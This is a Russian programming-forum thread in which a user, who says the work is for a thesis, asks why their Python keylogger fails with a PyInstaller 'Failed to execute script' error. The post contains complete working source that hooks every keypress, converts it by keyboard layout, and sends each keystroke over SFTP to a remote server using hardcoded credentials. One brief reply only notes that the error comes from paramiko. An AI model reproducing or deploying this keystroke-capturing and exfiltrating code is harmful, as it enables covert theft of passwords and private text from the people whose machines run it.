Форум программистов, компьютерный форум, киберфорум
Python: Решение задач
Войти
Регистрация
Восстановить пароль
Блоги Сообщество Поиск Заказать работу  
 
Рейтинг 4.86/7: Рейтинг темы: голосов - 7, средняя оценка - 4.86
0 / 0 / 0
Регистрация: 23.05.2023
Сообщений: 1

Кейлоггер, ошибка Failed to execute script 'test' due to unhandled exception

08.06.2023, 14:01. Показов 2227. Ответов 1
Метки нет (Все метки)

Студворк — интернет-сервис помощи студентам
Добрый день, столкнулся с такой проблемой. Пишу кейлоггер для дипломного проекта, было решено сделать запись символа в файл на сервере. Собираю решение в Sublime text, все работает, аналогично pycharm. Если запустить в Windows, то выходит такой текст и консоль сразу закрывается:

Traceback (most recent call last):
File test.py, line 11, in module
remotepath = '/home/stepan/logs.txt' # это путь куда сохраним наш файл на другом пк
File "paramiko\sftp_client.py", line 757, in put
FileNotFoundError: [WinError 2] Не удается найти указанный файл: '123.txt'
[2960] Failed to execute script 'test' due to unhandled exception

Не могу понять как и почему он ищет файл '123.txt', он не указан в программе.

Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
import keyboard
import paramiko
from ctypes import windll
import os
 
 
host = '192.168.1.32'  # тут должен быть ip твоего сервера на котором настроенно ssh
user = 'stepan'  # это логин для входа в систему
secret = '123456'  # ну тут понятно пароль от юзера
port = 22  # порт
 
 
def get_current_keyboard_layout():
    hwnd = windll.user32.GetForegroundWindow()
    thread_id = windll.user32.GetWindowThreadProcessId(hwnd, 0)
    layout_id = windll.user32.GetKeyboardLayout(thread_id)
    return layout_id & 0xFFFF
 
 
def convert_key_to_russian(key):
    # Словарь с соответствиями символов для русской раскладки
    conversion_map = {
        'q': 'й', 'w': 'ц', 'e': 'у', 'r': 'к', 't': 'е',
        'y': 'н', 'u': 'г', 'i': 'ш', 'o': 'щ', 'p': 'з',
        '[': 'х', ']': 'ъ', 'a': 'ф', 's': 'ы', 'd': 'в',
        'f': 'а', 'g': 'п', 'h': 'р', 'j': 'о', 'k': 'л',
        'l': 'д', ';': 'ж', "'": 'э', 'z': 'я', 'x': 'ч',
        'c': 'с', 'v': 'м', 'b': 'и', 'n': 'т', 'm': 'ь',
        ',': 'б', '.': 'ю', '/': '.'
    }
 
    converted_key = conversion_map.get(key.lower(), key)
 
    if key in ['shift', 'alt', 'ctrl', 'caps lock', 'tab', 'enter', 'space', 'backspace']:
        converted_key = ' ' + converted_key + ' '  # Добавляем пробел после специальных клавиш
 
    return converted_key
 
 
def convert_key_to_english(key):
    # Словарь с соответствиями символов для английской раскладки
    conversion_map = {
        'й': 'q', 'ц': 'w', 'у': 'e', 'к': 'r', 'е': 't',
        'н': 'y', 'г': 'u', 'ш': 'i', 'щ': 'o', 'з': 'p',
        'х': '[', 'ъ': ']', 'ф': 'a', 'ы': 's', 'в': 'd',
        'а': 'f', 'п': 'g', 'р': 'h', 'о': 'j', 'л': 'k',
        'д': 'l', 'ж': ';', 'э': "'", 'я': 'z', 'ч': 'x',
        'с': 'c', 'м': 'v', 'и': 'b', 'т': 'n', 'ь': 'm',
        'б': ',', 'ю': '.', '.': '/'
    }
 
    converted_key = conversion_map.get(key.lower(), key)
 
    if key in ['shift', 'alt', 'ctrl', 'caps lock', 'tab', 'enter', 'space', 'backspace']:
        converted_key = ' ' + converted_key + ' '  # Добавляем пробел после специальных клавиш
 
    return converted_key
 
 
def on_key_press(event):
 
    layout_id = get_current_keyboard_layout()
    print("Key Pressed:", event.name)
    print("Current Keyboard Layout:", layout_id)
 
    if layout_id == 1049:
        converted_key = convert_key_to_russian(event.name)
        print("Converted Key (Russian):", converted_key)
        transport = paramiko.Transport((host, port))
        transport.connect(username=user, password=secret)
        sftp = paramiko.SFTPClient.from_transport(transport)
    
        # Открываем файл на запись (если файл не существует, будет создан новый)
        with sftp.open('/home/stepan/logs.txt', 'a') as file:
            file.write(converted_key)
    
        sftp.close()
        transport.close()
 
    elif layout_id == 1033:
        converted_key = convert_key_to_english(event.name)
        print("Converted Key (English):", converted_key)
        transport = paramiko.Transport((host, port))
        transport.connect(username=user, password=secret)
        sftp = paramiko.SFTPClient.from_transport(transport)
    
        # Открываем файл на запись (если файл не существует, будет создан новый)
        with sftp.open('/home/stepan/logs.txt', 'a') as file:
            file.write(converted_key)
    
        sftp.close()
        transport.close()
 
 
 
# Регистрация обработчика нажатия клавиш
keyboard.on_press(on_key_press)
 
 
try:
    while True:
        keyboard.wait()
    raise RuntimeError()
except Exception as error:
    print(error)
0
Programming
Эксперт
39485 / 9562 / 3019
Регистрация: 12.04.2006
Сообщений: 41,671
Блог
08.06.2023, 14:01
Ответы с готовыми решениями:

The process was terminated due to an unhandled exception
Отваливается прога без ответа и привета... в журнале ощибок оставляет метку Тип события: Ошибка Источник события: .NET...

Ошибка при запуске .exe файла: Failed to execute script main
Написал довольно объёмное приложение, использую среду разработки PyCharm. Пробовал сгенерировать exe файл с помощью ввода в терминал...

При вызове Process.Start() возникает ошибка "failed to execute script Parser"
При вызове myProcess.Start() возникает ошибка "failed to execute script Parser". Дальше программа пытается работать как обычно, исключения...

1
 Аватар для Semen-Semenich
5234 / 3479 / 1175
Регистрация: 21.03.2016
Сообщений: 8,307
08.06.2023, 14:27
Цитата Сообщение от Milyy_Avgustin Посмотреть сообщение
Не могу понять как и почему он ищет файл '123.txt', он не указан в программе
так как бы
Цитата Сообщение от Milyy_Avgustin Посмотреть сообщение
File "paramiko\sftp_client.py", line 757, in put
FileNotFoundError: [WinError 2] Не удается найти указанный файл: '123.txt'
он ищет его через модуль paramiko. значит там указан
0
Надоела реклама? Зарегистрируйтесь и она исчезнет полностью.
inter-admin
Эксперт
29715 / 6470 / 2152
Регистрация: 06.03.2009
Сообщений: 28,500
Блог
08.06.2023, 14:27
Помогаю со студенческими работами здесь

Failed to execute script main
Сделал программку, попробовал перевести в .exe Выдаёт ошибку при открытии значка. Failed to execute script main Бывало ли у...

Pyinstaller - failed to execute script
Ошибка вылетает на старте, из библиотек: from selenium import webdriver from selenium.webdriver.chrome.options import Options ...

Fatal error detected failed to execute script starter
помогите

Fatal error detected failed to execute script starter
Добрый день ! Установил вчера игру Shadow of the Tomb Raider. И теперь постоянно аосле перезагрузки вылазиет ошибка Fatal error detected...

Fatal error detected failed to execute script starter
Всем привет! по сайту понял я не одинок с такой проблемой, но только честно не заметил после чего стала появляться ошибка. Симптомы те...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
2
Ответ Создать тему
Новые блоги и статьи
Переходник USB-CAN-GPIO
Eddy_Em 20.03.2026
Достаточно давно на работе возникла необходимость в переходнике CAN-USB с гальваноразвязкой, оный и был разработан. Однако, все меня терзала совесть, что аж 48-ногий МК используется так тупо: просто. . .
Оттенки серого
Argus19 18.03.2026
Оттенки серого Нашёл в интернете 3 прекрасных модуля: Модуль класса открытия диалога открытия/ сохранения файла на Win32 API; Модуль класса быстрого перекодирования цветного изображения в оттенки. . .
SDL3 для Desktop (MinGW): Рисуем цветные прямоугольники с помощью рисовальщика SDL3 на Си и C++
8Observer8 17.03.2026
Содержание блога Финальные проекты на Си и на C++: finish-rectangles-sdl3-c. zip finish-rectangles-sdl3-cpp. zip
Символические и жёсткие ссылки в Linux.
algri14 15.03.2026
Существует два типа ссылок — символические и жёсткие. Ссылка в Linux — это запись в каталоге, которая может указывать либо на inode «файла-ИСТОЧНИКА», тогда это будет «жёсткая ссылка» (hard link),. . .
[Owen Logic] Поддержание уровня воды в резервуаре количеством включённых насосов: моделирование и выбор регулятора
ФедосеевПавел 14.03.2026
Поддержание уровня воды в резервуаре количеством включённых насосов: моделирование и выбор регулятора ВВЕДЕНИЕ Выполняя задание на управление насосной группой заполнения резервуара,. . .
делаю науч статью по влиянию грибов на сукцессию
anaschu 13.03.2026
прикрепляю статью
SDL3 для Desktop (MinGW): Создаём пустое окно с нуля для 2D-графики на SDL3, Си и C++
8Observer8 10.03.2026
Содержание блога Финальные проекты на Си и на C++: hello-sdl3-c. zip hello-sdl3-cpp. zip Результат:
Установка CMake и MinGW 13.1 для сборки С и C++ приложений из консоли и из Qt Creator в EXE
8Observer8 10.03.2026
Содержание блога MinGW - это коллекция инструментов для сборки приложений в EXE. CMake - это система сборки приложений. Здесь описаны базовые шаги для старта программирования с помощью CMake и. . .
КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin
Copyright ©2000 - 2026, CyberForum.ru